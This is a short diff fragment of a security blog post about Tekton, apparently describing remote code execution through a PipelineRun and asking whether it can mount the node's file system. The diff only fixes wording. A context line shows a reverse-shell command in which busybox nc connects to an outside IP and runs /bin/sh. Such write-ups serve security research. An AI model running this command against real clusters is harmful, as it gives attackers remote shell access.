fl0mb/fl0mb.github.io/content/posts/tekton/index.md

   busybox nc 192.168.58.1 8000 -e /bin/sh
 ```

-RCE is nice but I thought this looks a lot like a normal pod definition, can it do anything malicious like mounting the nodes filesystem?
+RCE is nice, but I thought this looks a lot like a normal pod definition, can it do anything malicious like mounting the node's file system?

 I tried to get a minimal PipelineRun by repeatedly removing potentially unimportant lines until it breaks, which finally led me to: